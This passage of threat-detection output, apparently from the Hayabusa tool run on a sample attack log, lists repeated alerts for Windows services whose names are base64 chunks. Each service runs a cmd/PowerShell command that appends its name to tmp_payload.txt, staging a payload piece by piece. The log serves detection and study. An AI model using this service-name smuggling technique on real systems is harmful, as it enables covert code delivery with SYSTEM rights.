+09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: AgICANCiAgICAgICAgICAgIFdyaXRlLUxvZyAkRVJST1JfTE9HICJPcGVyYXRpb24gY2FuY2VsbGVkIGJ5IHVzZXIiDQoNCiAgICAgICAgICAgIFdyaXRlLUxvZyAkRVJST1JfTE9HICRFcnJvclsw | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg182"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:19:38.333 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: AgICANCiAgICAgICAgICAgIFdyaXRlLUxvZyAkRVJST1JfTE9HICJPcGVyYXRpb24gY2FuY2VsbGVkIGJ5IHVzZXIiDQoNCiAgICAgICAgICAgIFdyaXRlLUxvZyAkRVJST1JfTE9HICRFcnJvclsw | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg182"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:19:39.787 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: XQ0KDQogICAgICAgICAgICAkRXJyb3JMaW5lTnVtYmVyID0gJEVycm9yWzBdLkludm9jYXRpb25JbmZvLnNjcmlwdGxpbmVudW1iZXINCg0KICAgICAgICAgICAgV3JpdGUtTG9nICRFUlJPUl9MT0 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg183"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - 
Tchopper.evtx" +2021-11-03 17:19:39.787 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: XQ0KDQogICAgICAgICAgICAkRXJyb3JMaW5lTnVtYmVyID0gJEVycm9yWzBdLkludm9jYXRpb25JbmZvLnNjcmlwdGxpbmVudW1iZXINCg0KICAgICAgICAgICAgV3JpdGUtTG9nICRFUlJPUl9MT0 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg183"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:19:39.787 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: XQ0KDQogICAgICAgICAgICAkRXJyb3JMaW5lTnVtYmVyID0gJEVycm9yWzBdLkludm9jYXRpb25JbmZvLnNjcmlwdGxpbmVudW1iZXINCg0KICAgICAgICAgICAgV3JpdGUtTG9nICRFUlJPUl9MT0 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg183"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:19:41.247 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: cgIkNhdWdodCBvbiBsaW5lIG51bWJlcjogJEVycm9yTGluZU51bWJlciINCg0KICAgICAgICAgICAgZXhpdA0KICAgICAgICAgICAgDQogICAgICAgIH0gDQoNCiAgICAgICAgDQogICAgIH0NCiAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg184"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service 
execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:19:41.247 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: cgIkNhdWdodCBvbiBsaW5lIG51bWJlcjogJEVycm9yTGluZU51bWJlciINCg0KICAgICAgICAgICAgZXhpdA0KICAgICAgICAgICAgDQogICAgICAgIH0gDQoNCiAgICAgICAgDQogICAgIH0NCiAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg184"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:19:41.247 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: cgIkNhdWdodCBvbiBsaW5lIG51bWJlcjogJEVycm9yTGluZU51bWJlciINCg0KICAgICAgICAgICAgZXhpdA0KICAgICAgICAgICAgDQogICAgICAgIH0gDQoNCiAgICAgICAgDQogICAgIH0NCiAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg184"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:19:42.700 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: ICAgDQogICAgIGNhdGNoIHsNCiAgICAgDQogICAgICAgIFdyaXRlLUxvZyAkRVJST1JfTE9HICJVbmFibGUgdG8gU2VsZWN0IEZvbGRlciINCg0KICAgICAgICBXcml0ZS1Mb2cgJEVSUk9SX0xPRy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg185"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand 
start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:19:42.700 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: ICAgDQogICAgIGNhdGNoIHsNCiAgICAgDQogICAgICAgIFdyaXRlLUxvZyAkRVJST1JfTE9HICJVbmFibGUgdG8gU2VsZWN0IEZvbGRlciINCg0KICAgICAgICBXcml0ZS1Mb2cgJEVSUk9SX0xPRy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg185"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:19:42.700 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: ICAgDQogICAgIGNhdGNoIHsNCiAgICAgDQogICAgICAgIFdyaXRlLUxvZyAkRVJST1JfTE9HICJVbmFibGUgdG8gU2VsZWN0IEZvbGRlciINCg0KICAgICAgICBXcml0ZS1Mb2cgJEVSUk9SX0xPRy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg185"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:19:44.139 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: AkRXJyb3JbMF0NCg0KICAgICAgICAkRXJyb3JMaW5lTnVtYmVyID0gJEVycm9yWzBdLkludm9jYXRpb25JbmZvLnNjcmlwdGxpbmVudW1iZXINCg0KICAgICAgICBXcml0ZS1Mb2cgJEVSUk9SX0xP | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg186"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: 
LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:19:44.139 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: AkRXJyb3JbMF0NCg0KICAgICAgICAkRXJyb3JMaW5lTnVtYmVyID0gJEVycm9yWzBdLkludm9jYXRpb25JbmZvLnNjcmlwdGxpbmVudW1iZXINCg0KICAgICAgICBXcml0ZS1Mb2cgJEVSUk9SX0xP | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg186"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:19:44.139 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: AkRXJyb3JbMF0NCg0KICAgICAgICAkRXJyb3JMaW5lTnVtYmVyID0gJEVycm9yWzBdLkludm9jYXRpb25JbmZvLnNjcmlwdGxpbmVudW1iZXINCg0KICAgICAgICBXcml0ZS1Mb2cgJEVSUk9SX0xP | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg186"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:19:45.593 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: RyAiQ2F1Z2h0IG9uIGxpbmUgbnVtYmVyOiAkRXJyb3JMaW5lTnVtYmVyIg0KDQogICAgICAgIGV4aXQNCiAgICAgICAgDQogICAgIH0NCn0NCg0KDQojIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg187"" | select -Expand DisplayName |out-file 
-append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:19:45.593 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: RyAiQ2F1Z2h0IG9uIGxpbmUgbnVtYmVyOiAkRXJyb3JMaW5lTnVtYmVyIg0KDQogICAgICAgIGV4aXQNCiAgICAgICAgDQogICAgIH0NCn0NCg0KDQojIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg187"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:19:45.593 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: RyAiQ2F1Z2h0IG9uIGxpbmUgbnVtYmVyOiAkRXJyb3JMaW5lTnVtYmVyIg0KDQogICAgICAgIGV4aXQNCiAgICAgICAgDQogICAgIH0NCn0NCg0KDQojIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg187"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:19:47.051 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: MjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjDQojRnVuY3Rpb24gd2lsbCBnZW5lcmF0ZSBhIERyb3AgRG93biBNZW51 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg188"" | 
select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:19:47.051 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: MjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjDQojRnVuY3Rpb24gd2lsbCBnZW5lcmF0ZSBhIERyb3AgRG93biBNZW51 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg188"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:19:47.051 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: MjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjDQojRnVuY3Rpb24gd2lsbCBnZW5lcmF0ZSBhIERyb3AgRG93biBNZW51 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg188"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:19:48.519 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: IGJhc2VkIG9uIHRoZSBnaXZlbiBEcm9wIERvd24gT3B0aW9ucw0KDQojQHBhcmFtICREcm9wRG93bk9wdGlvbnMgLT4gIFRoZSBFdmVudCBMb2cgdGhhdCB3aWxsIGJlIGV2YWx1YXRlZCAoU2VjdX | Path: c:\windows\system32\cmd.exe /c powershell 
-command ""Get-Service ""seg189"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:19:48.519 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: IGJhc2VkIG9uIHRoZSBnaXZlbiBEcm9wIERvd24gT3B0aW9ucw0KDQojQHBhcmFtICREcm9wRG93bk9wdGlvbnMgLT4gIFRoZSBFdmVudCBMb2cgdGhhdCB3aWxsIGJlIGV2YWx1YXRlZCAoU2VjdX | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg189"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:19:48.519 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: IGJhc2VkIG9uIHRoZSBnaXZlbiBEcm9wIERvd24gT3B0aW9ucw0KDQojQHBhcmFtICREcm9wRG93bk9wdGlvbnMgLT4gIFRoZSBFdmVudCBMb2cgdGhhdCB3aWxsIGJlIGV2YWx1YXRlZCAoU2VjdX | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg189"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:19:49.957 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: JpdHksIEFwcGxpY2F0aW9uLCBTeXN0ZW0pDQojQHBhcmFtICRUaXRsZSAgICAgICAgICAgLT4gIFRoZSBUaXRsZSBvZiB0aGUgRHJvcCBEb3duIE1lbnUNCg0KIyMjIyMjIyMjIyMjIyMjIyMjIyMj | Path: 
c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg190"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:19:49.957 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: JpdHksIEFwcGxpY2F0aW9uLCBTeXN0ZW0pDQojQHBhcmFtICRUaXRsZSAgICAgICAgICAgLT4gIFRoZSBUaXRsZSBvZiB0aGUgRHJvcCBEb3duIE1lbnUNCg0KIyMjIyMjIyMjIyMjIyMjIyMjIyMj | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg190"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:19:49.957 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: JpdHksIEFwcGxpY2F0aW9uLCBTeXN0ZW0pDQojQHBhcmFtICRUaXRsZSAgICAgICAgICAgLT4gIFRoZSBUaXRsZSBvZiB0aGUgRHJvcCBEb3duIE1lbnUNCg0KIyMjIyMjIyMjIyMjIyMjIyMjIyMj | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg190"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:19:51.401 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: 
IyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIw0KDQpmdW5jdGlvbiBHZXQtSW5wdXRGcm9tRHJvcERvd24gey | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg191"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:19:51.401 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: IyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIw0KDQpmdW5jdGlvbiBHZXQtSW5wdXRGcm9tRHJvcERvd24gey | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg191"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:19:51.401 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: IyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIw0KDQpmdW5jdGlvbiBHZXQtSW5wdXRGcm9tRHJvcERvd24gey | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg191"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:19:52.841 
+09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: BwYXJhbSgkRHJvcERvd25PcHRpb25zLCAkVGl0bGUpDQoNCiAgICAgdHJ5IHsNCiAgICAgDQogICAgICAgIGZ1bmN0aW9uIFJldHVybi1Ecm9wRG93biB7DQogICAgICAgICAgICAkc2NyaXB0OkNo | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg192"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:19:52.841 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: BwYXJhbSgkRHJvcERvd25PcHRpb25zLCAkVGl0bGUpDQoNCiAgICAgdHJ5IHsNCiAgICAgDQogICAgICAgIGZ1bmN0aW9uIFJldHVybi1Ecm9wRG93biB7DQogICAgICAgICAgICAkc2NyaXB0OkNo | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg192"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:19:52.841 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: BwYXJhbSgkRHJvcERvd25PcHRpb25zLCAkVGl0bGUpDQoNCiAgICAgdHJ5IHsNCiAgICAgDQogICAgICAgIGZ1bmN0aW9uIFJldHVybi1Ecm9wRG93biB7DQogICAgICAgICAgICAkc2NyaXB0OkNo | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg192"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - 
Tchopper.evtx" +2021-11-03 17:19:54.310 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: b2ljZSA9ICREcm9wRG93bi5TZWxlY3RlZEl0ZW0uVG9TdHJpbmcoKQ0KICAgICAgICAgICAgJEZvcm0uQ2xvc2UoKQ0KICAgICAgICB9DQoNCiAgICAgICAgJEZvcm0gPSBOZXctT2JqZWN0IFN5c3 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg193"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:19:54.310 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: b2ljZSA9ICREcm9wRG93bi5TZWxlY3RlZEl0ZW0uVG9TdHJpbmcoKQ0KICAgICAgICAgICAgJEZvcm0uQ2xvc2UoKQ0KICAgICAgICB9DQoNCiAgICAgICAgJEZvcm0gPSBOZXctT2JqZWN0IFN5c3 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg193"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:19:54.310 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: b2ljZSA9ICREcm9wRG93bi5TZWxlY3RlZEl0ZW0uVG9TdHJpbmcoKQ0KICAgICAgICAgICAgJEZvcm0uQ2xvc2UoKQ0KICAgICAgICB9DQoNCiAgICAgICAgJEZvcm0gPSBOZXctT2JqZWN0IFN5c3 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg193"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service 
execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:19:55.761 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: RlbS5XaW5kb3dzLkZvcm1zLkZvcm0NCg0KICAgICAgICAkRm9ybS53aWR0aCA9IDMwMA0KICAgICAgICAkRm9ybS5oZWlnaHQgPSAxNTANCiAgICAgICAgJEZvcm0uVGV4dCA9IOKAnVNlbGVjdCAk | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg194"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:19:55.761 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: RlbS5XaW5kb3dzLkZvcm1zLkZvcm0NCg0KICAgICAgICAkRm9ybS53aWR0aCA9IDMwMA0KICAgICAgICAkRm9ybS5oZWlnaHQgPSAxNTANCiAgICAgICAgJEZvcm0uVGV4dCA9IOKAnVNlbGVjdCAk | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg194"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:19:55.761 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: 